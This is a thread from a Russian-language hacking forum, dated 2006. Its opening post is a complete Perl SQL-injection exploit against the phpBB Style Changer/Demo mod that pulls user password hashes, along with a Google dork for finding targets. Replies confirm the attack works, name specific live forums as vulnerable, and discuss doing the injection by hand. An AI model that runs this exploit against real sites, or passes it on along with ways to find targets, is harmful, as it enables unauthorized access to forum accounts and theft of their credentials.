Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   phpBB 2.0.19 Exploit (https://forum.antichat.xyz/showthread.php?t=14055)

m0nzt3r 06.02.2006 13:53

phpBB 2.0.19 Exploit
 
Окуеть уже до 19 дошли...
собственно вот линк _http://www.milw0rm.com/id.php?id=1469
а вот код
Код:

#!/usr/bin/perl
#########################################################
#                _______ _______ ______                #
#                |______ |______ |    \                #
#                ______| |______ |_____/                #
#                                                        #
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT        #
#Created By SkOd                                        #
#SED security Team                                      #
#http://www.sed-team.be                                #
#skod.uk@gmail.com                                      #
#ISRAEL                                                #
#########################################################
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
#########################################################
use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
#  phpBB Style Changer\Viewer MOD SQL injection Exploit  #
#                Tested on phpBB 2.0.19                          #
#            created By SkOd. SED Security Team            #
############################################################
        bbstyle.pl [HOST] [PATH] [Target id]
        bbstyle.pl www.host.com /phpbb2/ 2
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}

# milw0rm.com [2006-02-05]


Troxy 06.02.2006 14:31

shto ta nefuric4it kak nado


C:\>c:\perl\bin\perl.exe c:\bb2.pl http://******* /forums/ 2
[+]Make Connection
[+]Connected


i sjo poslje etovo

Desr0w 06.02.2006 14:49

у кого пахало?Я около 15 пробовал не пашет пока

k1b0rg 06.02.2006 14:59

Я незнаю как сплоит, я вручную все делал, работает на ура, у кого руки растут от ушей посвещаеться вот вам форум бажный
http://www.phpbbhacks.com/templatesdemo/
http://www.extremepixels.net/phpbb/
да и ваще их полно в гугле, монстр респект

D1mOn 06.02.2006 15:24

да вручную всё прекрасно работает!)))

limpompo 06.02.2006 15:52

Работает на все 100% =)

max_pain89 06.02.2006 16:40

У кого не работает, вы из форума копировали сплойт?

D1mOn 06.02.2006 16:42

да)))

limpompo 06.02.2006 16:47

Ошибка В Exploit-е есть =)) Ну что парни кто не любит в Ручную ищите Ошибку в Скрипте =))

+toxa+ 06.02.2006 17:02

Всё работает на ура, всё нормально


Время: 08:23